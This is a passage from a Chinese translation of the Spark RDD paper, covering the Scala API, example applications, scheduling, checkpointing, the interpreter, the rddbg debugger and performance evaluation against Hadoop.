Spark用Scala[5]语言实现了RDD的API。Scala是一种基于JVM的静态类型、函数式、面向对象的语言。我们选择Scala是因为它简洁（特别适合交互式使用）、有效（因为是静态类型）。但是，RDD抽象并不局限于函数式语言，也可以使用其他语言来实现RDD，比如像Hadoop[2]那样用类表示用户函数。

要使用Spark，开发者需要编写一个driver程序，连接到集群以运行Worker，如图2所示。Driver定义了一个或多个RDD，并调用RDD上的动作。Worker是长时间运行的进程，将RDD分区以Java对象的形式缓存在内存中。

图2 Spark的运行时。用户的driver程序启动多个worker，worker从分布式文件系统中读取数据块，并将计算后的RDD分区缓存在内存中。

再看看2.4中的例子，用户执行RDD操作时会提供参数，比如map传递一个闭包（closure，函数式编程中的概念）。Scala将闭包表示为Java对象，如果传递的参数是闭包，则这些对象被序列化，通过网络传输到其他节点上进行装载。Scala将闭包内的变量保存为Java对象的字段。例如，var x= 5; rdd.map(_ + x) 这段代码将RDD中的每个元素加5。总的来说，Spark的语言集成类似于DryadLINQ。

RDD本身是静态类型对象，由参数指定其元素类型。例如，RDD[int]是一个整型RDD。不过，我们举的例子几乎都省略了这个类型参数，因为Scala支持类型推断。

虽然在概念上使用Scala实现RDD很简单，但还是要处理一些Scala闭包对象的反射问题。如何通过Scala解释器来使用Spark还需要更多工作，这点我们将在第6部分讨论。不管怎样，我们都不需要修改Scala编译器。

3.1 Spark中的RDD操作

表2列出了Spark中的RDD转换和动作。每个操作都给出了标识，其中方括号表示类型参数。前面说过转换是延迟操作，用于定义新的RDD；而动作启动计算操作，并向用户程序返回值或向外部存储写数据。

转换	map(f : T ) U) : RDD[T] ) RDD[U] filter(f : T ) Bool) : RDD[T] ) RDD[T] flatMap(f : T ) Seq[U]) : RDD[T] ) RDD[U] sample(fraction : Float) : RDD[T] ) RDD[T] (Deterministic sampling) groupByKey() : RDD[(K, V)] ) RDD[(K, Seq[V])] reduceByKey(f : (V; V) ) V) : RDD[(K, V)] ) RDD[(K, V)] union() : (RDD[T]; RDD[T]) ) RDD[T] join() : (RDD[(K, V)]; RDD[(K, W)]) ) RDD[(K, (V, W))] cogroup() : (RDD[(K, V)]; RDD[(K, W)]) ) RDD[(K, (Seq[V], Seq[W]))] crossProduct() : (RDD[T]; RDD[U]) ) RDD[(T, U)] mapValues(f : V ) W) : RDD[(K, V)] ) RDD[(K, W)] (Preserves partitioning) sort(c : Comparator[K]) : RDD[(K, V)] ) RDD[(K, V)] partitionBy(p : Partitioner[K]) : RDD[(K, V)] ) RDD[(K, V)]
动作	count() : RDD[T] ) Long collect() : RDD[T] ) Seq[T] reduce(f : (T; T) ) T) : RDD[T] ) T lookup(k : K) : RDD[(K, V)] ) Seq[V] (On hash/range partitioned RDDs) save(path : String) : Outputs RDD to a storage system, e.g., HDFS
表3 Spark中支持的RDD转换和动作

注意，有些操作只对键值对可用，比如join。另外，函数名与Scala及其他函数式语言中的API匹配，例如map是一对一的映射，而flatMap是将每个输入映射为一个或多个输出（与MapReduce中的map类似）。

除了这些操作以外，用户还可以请求将RDD缓存起来。而且，用户还可以通过Partitioner类获取RDD的分区顺序，然后将另一个RDD按照同样的方式分区。有些操作会自动产生一个哈希或范围分区的RDD，像groupByKey，reduceByKey和sort等。

4. 应用程序示例

现在我们讲述如何使用RDD表示几种基于数据并行的应用。首先讨论一些迭代式机器学习应用（4.1），然后看看如何使用RDD描述几种已有的集群编程模型，即MapReduce（4.2），Pregel（4.3），和Hadoop（4.4）。最后讨论一下RDD不适合哪些应用（4.5）。

4.1 迭代式机器学习

很多机器学习算法都具有迭代特性，运行迭代优化方法来优化某个目标函数，例如梯度下降方法。如果这些算法的工作集能够放入内存，将极大地加速程序运行。而且，这些算法通常采用批量操作，例如映射和求和，这样更容易使用RDD来表示。

例如下面的程序是逻辑回归[15]的实现。逻辑回归是一种常见的分类算法，即寻找一个最佳分割两组点（即垃圾邮件和非垃圾邮件）的超平面w。算法采用梯度下降的方法：开始时w为随机值，在每一次迭代的过程中，对w的函数求和，然后朝着优化的方向移动w。

1	val points = spark.textFile(...)
2	.map(parsePoint).persist()

3	var w = // random initial vector
4	for (i <- 1 to ITERATIONS) {

5	val gradient = points.map{ p =>
6	p.x * (1/(1+exp(-p.y(w dot p.x)))-1)p.y

7	}.reduce((a,b) => a+b)
8	w -= gradient

}

首先定义一个名为points的缓存RDD，这是在文本文件上执行map转换之后得到的，即将每个文本行解析为一个Point对象。然后在points上反复执行map和reduce操作，每次迭代时通过对当前w的函数进行求和来计算梯度。7.1小节我们将看到这种在内存中缓存points的方式，比每次迭代都从磁盘文件装载数据并进行解析要快得多。

已经在Spark中实现的迭代式机器学习算法还有：kmeans（像逻辑回归一样每次迭代时执行一对map和reduce操作），期望最大化算法（EM，两个不同的map/reduce步骤交替执行），交替最小二乘矩阵分解和协同过滤算法。Chu等人提出迭代式MapReduce也可以用来实现常用的学习算法[11]。

4.2 使用RDD实现MapReduce

MapReduce模型[12]很容易使用RDD进行描述。假设有一个输入数据集（其元素类型为T），和两个函数myMap:T => List[(Ki, Vi)] 和 myReduce: (Ki; List[Vi]) )List[R]，代码如下：

1	data.flatMap(myMap)
2	.groupByKey()

3	.map((k, vs) => myReduce(k, vs))

如果任务包含combiner，则相应的代码为：

1	data.flatMap(myMap)
2	.reduceByKey(myCombiner)

3	.map((k, v) => myReduce(k, v))

ReduceByKey操作在mapper节点上执行部分聚集，与MapReduce的combiner类似。

4.3 使用RDD实现Pregel

Pregel[21]是面向图算法的基于BSP范式[32]的编程模型。程序由一系列超步（Superstep）协调迭代运行。在每个超步中，各个顶点执行用户函数，并更新相应的顶点状态，变异图拓扑，然后向下一个超步的顶点集发送消息。这种模型能够描述很多图算法，包括最短路径，双边匹配和PageRank等。

以PageRank为例介绍一下Pregel的实现。当前PageRank[7]记为r，顶点表示状态。在每个超步中，各个顶点向其所有邻居发送贡献值r/n，这里n是邻居的数目。下一个超步开始时，每个顶点将其分值（rank）更新为 α/N +(1 - α) * Σci，这里的求和是各个顶点收到的所有贡献值的和，N是顶点的总数。

Pregel将输入的图划分到各个worker上，并存储在其内存中。在每个超步中，各个worker通过一种类似MapReduce的Shuffle操作交换消息。

Pregel的通信模式可以用RDD来描述，如图3。主要思想是：将每个超步中的顶点状态和要发送的消息存储为RDD，然后根据顶点ID分组，进行Shuffle通信（即cogroup操作）。然后对每个顶点ID上的状态和消息应用用户函数（即mapValues操作），产生一个新的RDD，即(VertexID,(NewState, OutgoingMessages))。然后执行map操作分离出下一次迭代的顶点状态和消息（即mapValues和flatMap操作）。代码如下：

1	val vertices = // RDD of (ID, State) pairs
2	val messages = // RDD of (ID, Message) pairs

3	val grouped = vertices.cogroup(messages)
4	val newData = grouped.mapValues {

5	(vert, msgs) => userFunc(vert, msgs)
6	// returns (newState, outgoingMsgs)

7	}.cache()
8	val newVerts = newData.mapValues((v,ms) => v)

9	val newMsgs = newData.flatMap((id,(v,ms)) => ms)

图3 使用RDD实现Pregel时，一步迭代的数据流。（方框表示RDD，箭头表示转换）
需要注意的是，这种实现方法中，RDD grouped，newData和newVerts的分区方法与输入RDDvertices一样。所以，顶点状态一直存在于它们开始执行的机器上，这跟原Pregel一样，这样就减少了通信成本。因为cogroup和mapValues保持了与输入RDD相同的分区方法，所以分区是自动进行的。

完整的Pregel编程模型还包括其他工具，比如combiner，附录A讨论了它们的实现。下面将讨论Pregel的容错性，以及如何在实现相同容错性的同时减少需要执行检查点操作的数据量。

我们差不多用了100行Scala代码在Spark上实现了一个类Pregel的API。7.2小节将使用PageRank算法评估它的性能。

4.3.1 Pregel容错

当前，Pregel基于检查点机制来为顶点状态及其消息实现容错[21]。然而作者是这样描述的：通过在其它的节点上记录已发消息日志，然后单独重建丢失的分区，只需要恢复局部数据即可。上面提到这两种方式，RDD都能够很好地支持。

通过4.3小节的实现，Spark总是能够基于Lineage实现顶点和消息RDD的重建，但是由于过长的Lineage链，恢复可能会付出高昂的代价。因为迭代RDD依赖于上一个RDD，对于部分分区来说，节点故障可能会导致这些分区状态的所有迭代版本丢失，这就要求使用一种“级联-重新执行”[20]的方式去依次重建每一个丢失的分区。为了避免这个问题，用户可以周期性地在顶点和消息RDD上执行save操作，将状态信息保存到持久存储中。然后，Spark能够在失败的时候自动地重新计算这些丢失的分区（而不是回滚整个程序）。

最后，我们意识到，RDD也能够实现检查点数据的reduce操作，这要求通过一种高效的检查点方案来表达检查点数据。在很多Pregel作业中，顶点状态都包括可变与不可变的组件，例如，在PageRank中，与一个顶点相邻的顶点列表是不可变的，但是它们的排名是可变的，在这种情况下，我们可以使用一个来自可变数据的单独RDD来替换不可变RDD，基于这样一个较短的Lineage链，检查点仅仅是可变状态，图4解释了这种方式。

图4 经过优化的Pregel使用RDD的数据流。可变状态RDD必须设置检查点，不可变状态才可被快速重建。
在PageRank中，不可变状态（相邻顶点列表）远大于可变状态（浮点值），所以这种方式能够极大地降低开销。

4.4 使用RDD实现HaLoop

HaLoop[8]是Hadoop的一个扩展版本，它能够改善具有迭代特性的MapReduce程序的性能。基于HaLoop编程模型的应用，使用reduce阶段的输出作为map阶段下一轮迭代的输入。它的循环感知任务调度器能够保证，在每一轮迭代中处理同一个分区数据的连续map和reduce任务，一定能够在同一台物理机上执行。确保迭代间locality特性，reduce数据在物理节点之间传输，并且允许数据缓存在本地磁盘而能够被后续迭代重用。

使用RDD来优化HaLoop，我们在Spark上实现了一个类似HaLoop的API，这个库只使用了200行Scala代码。通过partitionBy能够保证跨迭代的分区的一致性，每一个阶段的输入和输出被缓存以用于后续迭代。

4.5 不适合使用RDD的应用

在2.1节我们讨论过，RDD适用于具有批量转换需求的应用，并且相同的操作作用于数据集的每一个元素上。在这种情况下，RDD能够记住每个转换操作，对应于Lineage图中的一个步骤，恢复丢失分区数据时不需要写日志记录大量数据。RDD不适合那些通过异步细粒度地更新来共享状态的应用，例如Web应用中的存储系统，或者增量抓取和索引Web数据的系统，这样的应用更适合使用一些传统的方法，例如数据库、RAMCloud[26]、Percolator[27]和Piccolo[28]。我们的目标是，面向批量分析应用的这类特定系统，提供一种高效的编程模型，而不是一些异步应用程序。

5. RDD的描述及作业调度

我们希望在不修改调度器的前提下，支持RDD上的各种转换操作，同时能够从这些转换获取Lineage信息。为此，我们为RDD设计了一组小型通用的内部接口。

简单地说，每个RDD都包含：（1）一组RDD分区（partition，即数据集的原子组成部分）；（2）对父RDD的一组依赖，这些依赖描述了RDD的Lineage；（3）一个函数，即在父RDD上执行何种计算；（4）元数据，描述分区模式和数据存放的位置。例如，一个表示HDFS文件的RDD包含：各个数据块的一个分区，并知道各个数据块放在哪些节点上。而且这个RDD上的map操作结果也具有同样的分区，map函数是在父数据上执行的。表3总结了RDD的内部接口。

操作	含义
partitions()	返回一组Partition对象
preferredLocations(p)	根据数据存放的位置，返回分区p在哪些节点访问更快
dependencies()	返回一组依赖
iterator(p, parentIters)	按照父分区的迭代器，逐个计算分区p的元素
partitioner()	返回RDD是否hash/range分区的元数据信息
表3 Spark中RDD的内部接口

设计接口的一个关键问题就是，如何表示RDD之间的依赖。我们发现RDD之间的依赖关系可以分为两类，即：（1）窄依赖（narrowdependencies）：子RDD的每个分区依赖于常数个父分区（即与数据规模无关）；（2）宽依赖（widedependencies）：子RDD的每个分区依赖于所有父RDD分区。例如，map产生窄依赖，而join则是宽依赖（除非父RDD被哈希分区）。另一个例子见图5。

图5 窄依赖和宽依赖的例子。（方框表示RDD，实心矩形表示分区）
区分这两种依赖很有用。首先，窄依赖允许在一个集群节点上以流水线的方式（pipeline）计算所有父分区。例如，逐个元素地执行map、然后filter操作；而宽依赖则需要首先计算好所有父分区数据，然后在节点之间进行Shuffle，这与MapReduce类似。第二，窄依赖能够更有效地进行失效节点的恢复，即只需重新计算丢失RDD分区的父分区，而且不同节点之间可以并行计算；而对于一个宽依赖关系的Lineage图，单个节点失效可能导致这个RDD的所有祖先丢失部分分区，因而需要整体重新计算。

通过RDD接口，Spark只需要不超过20行代码实现便可以实现大多数转换。5.1小节给出了例子，然后我们讨论了怎样使用RDD接口进行调度（5.2），最后讨论一下基于RDD的程序何时需要数据检查点操作（5.3）。

5.1 RDD实现举例

HDFS文件：目前为止我们给的例子中输入RDD都是HDFS文件，对这些RDD可以执行：partitions操作返回各个数据块的一个分区（每个Partition对象中保存数据块的偏移），preferredLocations操作返回数据块所在的节点列表，iterator操作对数据块进行读取。

map：任何RDD上都可以执行map操作，返回一个MappedRDD对象。该操作传递一个函数参数给map，对父RDD上的记录按照iterator的方式执行这个函数，并返回一组符合条件的父RDD分区及其位置。

union：在两个RDD上执行union操作，返回两个父RDD分区的并集。通过相应父RDD上的窄依赖关系计算每个子RDD分区（注意union操作不会过滤重复值，相当于SQL中的UNIONALL）。

sample：抽样与映射类似，但是sample操作中，RDD需要存储一个随机数产生器的种子，这样每个分区能够确定哪些父RDD记录被抽样。

join：对两个RDD执行join操作可能产生窄依赖（如果这两个RDD拥有相同的哈希分区或范围分区），可能是宽依赖，也可能两种依赖都有（比如一个父RDD有分区，而另一父RDD没有）。

5.2 Spark任务调度器

调度器根据RDD的结构信息为每个动作确定有效的执行计划。调度器的接口是runJob函数，参数为RDD及其分区集，和一个RDD分区上的函数。该接口足以表示Spark中的所有动作（即count、collect、save等）。

总的来说，我们的调度器跟Dryad类似，但我们还考虑了哪些RDD分区是缓存在内存中的。调度器根据目标RDD的Lineage图创建一个由stage构成的无回路有向图（DAG）。每个stage内部尽可能多地包含一组具有窄依赖关系的转换，并将它们流水线并行化（pipeline）。stage的边界有两种情况：一是宽依赖上的Shuffle操作；二是已缓存分区，它可以缩短父RDD的计算过程。例如图6。父RDD完成计算后，可以在stage内启动一组任务计算丢失的分区。

图6 Spark怎样划分任务阶段（stage）的例子。实线方框表示RDD，实心矩形表示分区（黑色表示该分区被缓存）。要在RDD G上执行一个动作，调度器根据宽依赖创建一组stage，并在每个stage内部将具有窄依赖的转换流水线化（pipeline）。本例不用再执行stage 1，因为B已经存在于缓存中了，所以只需要运行2和3。

调度器根据数据存放的位置分配任务，以最小化通信开销。如果某个任务需要处理一个已缓存分区，则直接将任务分配给拥有这个分区的节点。否则，如果需要处理的分区位于多个可能的位置（例如，由HDFS的数据存放位置决定），则将任务分配给这一组节点。

对于宽依赖（例如需要Shuffle的依赖），目前的实现方式是，在拥有父分区的节点上将中间结果物化，简化容错处理，这跟MapReduce中物化map输出很像。

如果某个任务失效，只要stage中的父RDD分区可用，则只需在另一个节点上重新运行这个任务即可。如果某些stage不可用（例如，Shuffle时某个map输出丢失），则需要重新提交这个stage中的所有任务来计算丢失的分区。

最后，lookup动作允许用户从一个哈希或范围分区的RDD上，根据关键字读取一个数据元素。这里有一个设计问题。Driver程序调用lookup时，只需要使用当前调度器接口计算关键字所在的那个分区。当然任务也可以在集群上调用lookup，这时可以将RDD视为一个大的分布式哈希表。这种情况下，任务和被查询的RDD之间的并没有明确的依赖关系（因为worker执行的是lookup），如果所有节点上都没有相应的缓存分区，那么任务需要告诉调度器计算哪些RDD来完成查找操作。

5.3 检查点

尽管RDD中的Lineage信息可以用来故障恢复，但对于那些Lineage链较长的RDD来说，这种恢复可能很耗时。例如4.3小节中的Pregel任务，每次迭代的顶点状态和消息都跟前一次迭代有关，所以Lineage链很长。如果将Lineage链存到物理存储中，再定期对RDD执行检查点操作就很有效。

一般来说，Lineage链较长、宽依赖的RDD需要采用检查点机制。这种情况下，集群的节点故障可能导致每个父RDD的数据块丢失，因此需要全部重新计算[20]。将窄依赖的RDD数据存到物理存储中可以实现优化，例如前面4.1小节逻辑回归的例子，将数据点和不变的顶点状态存储起来，就不再需要检查点操作。

当前Spark版本提供检查点API，但由用户决定是否需要执行检查点操作。今后我们将实现自动检查点，根据成本效益分析确定RDDLineage图中的最佳检查点位置。

值得注意的是，因为RDD是只读的，所以不需要任何一致性维护（例如写复制策略，分布式快照或者程序暂停等）带来的开销，后台执行检查点操作。

我们使用10000行Scala代码实现了Spark。系统可以使用任何Hadoop数据源（如HDFS，Hbase）作为输入，这样很容易与Hadoop环境集成。Spark以库的形式实现，不需要修改Scala编译器。

这里讨论关于实现的三方面问题：（1）修改Scala解释器，允许交互模式使用Spark（6.1）；（2）缓存管理（6.2）；（3）调试工具rddbg（6.3）。

6. 实现

6.1 解释器的集成

像Ruby和Python一样，Scala也有一个交互式shell。基于内存的数据可以实现低延时，我们希望允许用户从解释器交互式地运行Spark，从而在大数据集上实现大规模并行数据挖掘。

Scala解释器通常根据将用户输入的代码行，来对类进行编译，接着装载到JVM中，然后调用类的函数。这个类是一个包含输入行变量或函数的单例对象，并在一个初始化函数中运行这行代码。例如，如果用户输入代码var x= 5，接着又输入println(x)，则解释器会定义一个包含x的Line1类，并将第2行编译为println(Line1.getInstance().x)。

在Spark中我们对解释器做了两点改动：

类传输：解释器能够支持基于HTTP传输类字节码，这样worker节点就能获取输入每行代码对应的类的字节码。
改进的代码生成逻辑：通常每行上创建的单态对象通过对应类上的静态方法进行访问。也就是说，如果要序列化一个闭包，它引用了前面代码行中变量，比如上面的例子Line1.x，Java不会根据对象关系传输包含x的Line1实例。所以worker节点不会收到x。我们将这种代码生成逻辑改为直接引用各个行对象的实例。图7说明了解释器如何将用户输入的一组代码行解释为Java对象。

图7 Spark解释器如何将用户输入的两行代码解释为Java对象
Spark解释器便于跟踪处理大量对象关系引用，并且便利了HDFS数据集的研究。我们计划以Spark解释器为基础，开发提供高级数据分析语言支持的交互式工具，比如类似SQL和Matlab。

6.2 缓存管理

Worker节点将RDD分区以Java对象的形式缓存在内存中。由于大部分操作是基于扫描的，采取RDD级的LRU（最近最少使用）替换策略（即不会为了装载一个RDD分区而将同一RDD的其他分区替换出去）。目前这种简单的策略适合大多数用户应用。另外，使用带参数的cache操作可以设定RDD的缓存优先级。

6.3 rddbg：RDD程序的调试工具

RDD的初衷是为了实现容错以能够再计算（re-computation），这个特性使得调试更容易。我们创建了一个名为rddbg的调试工具，它是通过基于程序记录的Lineage信息来实现的，允许用户：（1）重建任何由程序创建的RDD，并执行交互式查询；（2）使用一个单进程Java调试器（如jdb）传入计算好的RDD分区，能够重新运行作业中的任何任务。

我们强调一下，rddbg不是一个完全重放的调试器：特别是不对非确定性的代码或动作进行重放。但如果某个任务一直运行很慢（比如由于数据分布不均匀或者异常输入等原因），仍然可以用它来帮助找到其中的逻辑错误和性能问题。

举个例子，我们使用rddbg去解决用户Spam分类作业中的一个bug，这个作业中的每次迭代都产生0值。在调试器中重新执行reduce任务，很快就能发现，输入的权重向量（存储在一个用户自定义的向量类中）竟然是空值。由于从一个未初始化的稀疏向量中读取总是返回0，运行时也不会抛出异常。在这个向量类中设置一个断点，然后运行这个任务，引导程序很快就运行到设置的断点处，我们发现向量类的一个数组字段的值为空，我们诊断出了这个bug：稀疏向量类中的数据字段被错误地使用transient来修饰，导致序列化时忽略了该字段的数据。

rddbg给程序执行带来的开销很小。程序本来就需要将各个RDD中的所有闭包序列化并通过网络传送，只不过使用rddbg同时还要将这些闭集记录到磁盘。

7. 评估

我们在Amazon EC2[1]上进行了一系列实验来评估Spark及RDD的性能，并与Hadoop及其他应用程序的基准进行了对比。总的说来，结果如下：
（1）对于迭代式机器学习应用，Spark比Hadoop快20多倍。这种加速比是因为：数据存储在内存中，同时Java对象缓存避免了反序列化操作。
（2）用户编写的应用程序执行结果很好。例如，Spark分析报表比Hadoop快40多倍。
（3）如果节点发生失效，通过重建那些丢失的RDD分区，Spark能够实现快速恢复。
（4）Spark能够在5-7s延时范围内，交互式地查询1TB大小的数据集。
我们基准测试首先从一个运行在Hadoop上的具有迭代特征的机器学习应用（7.1）和PageRank（7.2）开始，然后评估在Spark中当工作集不能适应缓存（7.4）时系统容错恢复能力（7.3），最后讨论用户应用程序（7.5）和交互式数据挖掘（7.6）的结果。
除非特殊说明，我们的实验使用m1.xlarge EC2 节点，4核15GB内存，使用HDFS作为持久存储，块大小为256M。在每个作业运行执行时，为了保证磁盘读时间更加精确，我们清理了集群中每个节点的操作系统缓存。

7.1 可迭代的机器学习应用

我们实现了2个迭代式机器学习（ML）应用，Logistic回归和K-means算法，与如下系统进行性能对比：

Hadoop：Hadoop 0.20.0稳定版。
HadoopBinMem：在首轮迭代中执行预处理，通过将输入数据转换成为开销较低的二进制格式来减少后续迭代过程中文本解析的开销，在HDFS中加载到内存。
Spark：基于RDD的系统，在首轮迭代中缓存Java对象以减少后续迭代过程中解析、反序列化的开销。

我们使用同一数据集在相同条件下运行Logistic回归和K-means算法：使用400个任务（每个任务处理的输入数据块大小为256M），在25-100台机器，执行10次迭代处理100G输入数据集（表4）。两个作业的关键区别在于每轮迭代单个字节的计算量不同。K-means的迭代时间取决于更新聚类坐标耗时，Logistic回归是非计算密集型的，但是在序列化和解析过程中非常耗时。
由于典型的机器学习算法需要数10轮迭代，然后再合并，我们分别统计了首轮迭代和后续迭代计算的耗时，并从中发现，在内存中缓存RDD极大地加快了后续迭代的速度。

应用	数据描述	大小
Logistic回归	10亿9维点数据	100G
K-means	10亿10维点数据（k=10）	100G
PageRank	400万Wikipedia文章超链接图	49G
交互式数据挖掘	Wikipedia浏览日志（2008-10~2009-4）	1TB
表4 用于Spark基准程序的数据

首轮迭代。在首轮迭代过程中，三个系统都是从HDFS中读取文本数据作为输入。图9中“FirstIteration”显示了首轮迭代的柱状图，实验中Spark快于Hadoop，主要是因为Hadoop中的各个分布式组件基于心跳协议来发送信号带来了开销。HadoopBinMem是最慢的，因为它通过一个额外的MapReduce作业将数据转换成二进制格式。

图8 首轮迭代后Hadoop、HadoopBinMen、Spark运行时间对比

后续迭代。图9显示了后续迭代的平均耗时，图8对比了不同聚类大小条件下耗时情况，我们发现在100个节点上运行Logistic回归程序，Spark比Hadoop、HadoopBinMem分别快25.3、20.7倍。从图8（b）可以看到，Spark仅仅比Hadoop、HadoopBinMem分别快1.9、3.2倍，这是因为K-means程序的开销取决于计算（用更多的节点有助于提高计算速度的倍数）。

后续迭代中，Hadoop仍然从HDFS读取文本数据作为输入，所以从首轮迭代开始Hadoop的迭代时间并没有明显的改善。使用预先转换的SequenceFile文件（Hadoop内建的二进制文件格式），HadoopBinMem在后续迭代中节省了解析的代价，但是仍然带来的其他的开销，如从HDFS读SequenceFile文件并转换成Java对象。因为Spark直接读取缓存于RDD中的Java对象，随着聚类尺寸的线性增长，迭代时间大幅下降。

图9：首轮及其后续迭代平均时间对比
理解速度提升。我们非常惊奇地发现，Spark甚至胜过了基于内存存储二进制数据的Hadoop（HadoopBinMem），幅度高达20倍之多，Hadoop运行慢是由于如下几个原因：

Hadoop软件栈的最小开销
读数据时HDFS栈的开销
将二进制记录转换成内存Java对象的代价

为了估测1，我们运行空的Hadoop作业，仅仅执行作业的初始化、启动任务、清理工作就至少耗时25秒。对于2，我们发现为了服务每一个HDFS数据块，HDFS进行了多次复制以及计算校验和操作。

为了估测3，我们在单个节点上运行了微基准程序，在输入的256M数据上计算Logistic回归，结果如表5所示。首先，在内存中的HDFS文件和本地文件的不同导致通过HDFS接口读取耗时2秒，甚至数据就在本地内存中。其次，文本和二进制格式输入的不同造成了解析耗时7秒的开销。最后，预解析的二进制文件转换为内存中的Java对象，耗时3秒。每个节点处理多个块时这些开销都会累积起来，然而通过缓存RDD作为内存中的Java对象，Spark只需要耗时3秒。

内存中的HDFS文件	内存中的本地文件	缓存的RDD
文本输入二进制输入	15.38 (0.26) 8.38 (0.10)	13.13 (0.26) 6.86 (0.02)	2.93 (0.31) 2.93 (0.31)
表5 Logistic回归迭代时间

7.2 PageRank

通过使用存储在HDFS上的49GWikipedia导出数据，我们比较了使用RDD实现的Pregel与使用Hadoop计算PageRank的性能。PageRank算法通过10轮迭代处理了大约400万文章的链接图数据，图10显示了在30个节点上，Spark处理速度是Hadoop的2倍多，改进后对输入进行Hash分区速度提升到2.6倍，使用Combiner后提升到3.6倍，这些结果数据也随着节点扩展到60个时同步放大。

图10 迭代时间对比

7.3 容错恢复

基于K-means算法应用程序，我们评估了在单点故障（SPOF）时使用Lneage信息创建RDD分区的开销。图11显示了，K-means应用程序运行在75个节点的集群中进行了10轮迭代，我们在正常操作和进行第6轮迭代开始时一个节点发生故障的情况下对耗时进行了对比。没有任何失败，每轮迭代启动了400个任务处理100G数据。

图11 SPOF时K-means应用程序迭代时间
第5轮迭代结束时大约耗时58秒，第6轮迭代时Kill掉一个节点，该节点上的任务都被终止（包括缓存的分区数据）。Spark调度器调度这些任务在其他节点上重新并行运行，并且重新读取基于Lineage信息重建的RDD输入数据并进行缓存，这使得迭代计算耗时增加到80秒。一旦丢失的RDD分区被重建，平均迭代时间又回落到58秒。

7.4 内存不足时表现

到现在为止，我们能保证集群中的每个节点都有足够的内存去缓存迭代过程中使用的RDD，如果没有足够的内存来缓存一个作业的工作集，Spark又是如何运行的呢？在实验中，我们通过在每个节点上限制缓存RDD所需要的内存资源来配置Spark，在不同的缓存配置条件下执行Logistic回归，结果如图12。我们可以看出，随着缓存的减小，性能平缓地下降。

图12 Spark上运行Logistic回归的性能表现

7.5 基于Spark构建的用户应用程序

In-Memory分析。视频分发公司Conviva使用Spark极大地提升了为客户处理分析报告的速度，以前基于Hadoop使用大约20个Hive[3]查询来完成，这些查询作用在相同的数据子集上（满足用户提供的条件），但是在不同分组的字段上执行聚合操作（SUM、AVG、COUNTDISTINCT等）需要使用单独的MapReduce作业。该公司使用Spark只需要将相关数据加载到内存中一次，然后运行上述聚合操作，在Hadoop集群上处理200G压缩数据并生成报耗时20小时，而使用Spark基于96G内存的2个节点耗时30分钟即可完成，速度提升40倍，主要是因为不需要再对每个作业重复地执行解压缩和过滤操作。

城市交通建模。在Berkeley的MobileMillennium项目[17]中，基于一系列分散的汽车GPS监测数据，研究人员使用并行化机器学习算法来推算公路交通拥堵状况。数据来自市区10000个互联的公路线路网，还有600000个由汽车GPS装置采集到的样本数据，这些数据记录了汽车在两个地点之间行驶的时间（每一条路线的行驶时间可能跨多个公路线路网）。使用一个交通模型，通过推算跨多个公路网行驶耗时预期，系统能够估算拥堵状况。研究人员使用Spark实现了一个可迭代的EM算法，其中包括向Worker节点广播路线网络信息，在E和M阶段之间执行reduceByKey操作，应用从20个节点扩展到80个节点（每个节点4核），如图13（a）所示：

图13 每轮迭代运行时间（a）交通建模应用程序（b）基于Spark的社交网络的Spam分类
社交网络Spam分类。Berkeley的Monarch项目[31]使用Spark识别Twitter消息上的Spam链接。他们在Spark上实现了一个类似7.1小节中示例的Logistic回归分类器，不同的是使用分布式的reduceByKey操作并行对梯度向量求和。图13（b）显示了基于50G数据子集训练训练分类器的结果，整个数据集是250000的URL、至少10^7个与网络相关的特征/维度，内容、词性与访问一个URL的页面相关。随着节点的增加，这并不像交通应用程序那样近似线性，主要是因为每轮迭代的固定通信代价较高。

7.6 交互式数据挖掘

为了展示Spark交互式处理大数据集的能力，我们在100个m2.4xlargeEC2实例（8核68G内存）上使用Spark分析1TB从2008-10到2009-4这段时间的Wikipedia页面浏览日志数据，在整个输入数据集上简单地查询如下内容以获取页面浏览总数：（1）全部页面；（2）页面的标题能精确匹配给定的关键词；（3）页面的标题能部分匹配给定的关键词。

图14 显示了分别在整个、1/2、1/10的数据上查询的响应时间，甚至1TB数据在Spark上查询仅耗时5-7秒，这比直接操作磁盘数据快几个数量级。例如，从磁盘上查询1TB数据耗时170秒，这表明了RDD缓存使得Spark成为一个交互式数据挖掘的强大工具。

8. 相关工作

分布式共享内存（DSM）。RDD可以看成是一个基于DSM研究[24]得到的抽象。在2.5节我们讨论过，RDD提供了一个比DSM限制更严格的编程模型，并能在节点失效时高效地重建数据集。DSM通过检查点[19]实现容错，而Spark使用Lineage重建RDD分区，这些分区可以在不同的节点上重新并行处理，而不需要将整个程序回退到检查点再重新运行。RDD能够像MapReduce一样将计算推向数据[12]，并通过推测执行来解决某些任务计算进度落后的问题，推测执行在一般的DSM系统上是很难实现的。

In-Memory集群计算。Piccolo[28]是一个基于可变的、In-Memory的分布式表的集群编程模型。因为Piccolo允许读写表中的记录，它具有与DSM类似的恢复机制，需要检查点和回滚，但是不能推测执行，也没有提供类似groupBy、sort等更高级别的数据流算子，用户只能直接读取表单元数据来实现。可见，Piccolo是比Spark更低级别的编程模型，但是比DSM要高级。

RAMClouds[26]适合作为Web应用的存储系统，它同样提供了细粒度读写操作，所以需要通过记录日志来实现容错。

数据流系统。RDD借鉴了DryadLINQ[34]、Pig[25]和FlumeJava[9]的“并行收集”编程模型，通过允许用户显式地将未序列化的对象保存在内存中，以此来控制分区和基于key随机查找，从而有效地支持基于工作集的应用。RDD保留了那些数据流系统更高级别的编程特性，这对那些开发人员来说也比较熟悉，而且，RDD也能够支持更多类型的应用。RDD新增的扩展，从概念上看很简单，其中Spark是第一个使用了这些特性的系统，类似DryadLINQ编程模型，能够有效地支持基于工作集的应用。

面向基于工作集的应用，已经开发了一些专用系统，像Twister[13]、HaLoop[8]实现了一个支持迭代的MapReduce模型；Pregel[21]，支持图应用的BSP计算模型。RDD是一个更通用的抽象，它能够描述支持迭代的MapReduce、Pregel，还有现有一些系统未能处理的应用，如交互式数据挖掘。特别地，它能够让开发人员动态地选择操作来运行在RDD上（如查看查询的结果以决定下一步运行哪个查询），而不是提供一系列固定的步骤去执行迭代，RDD还支持更多类型的转换。

最后，Dremel[22]是一个低延迟查询引擎，它面向基于磁盘存储的大数据集，这类数据集是把嵌套记录数据生成基于列的格式。这种格式的数据也能够保存为RDD并在Spark系统中使用，但Spark也具备将数据加载到内存来实现快速查询的能力。

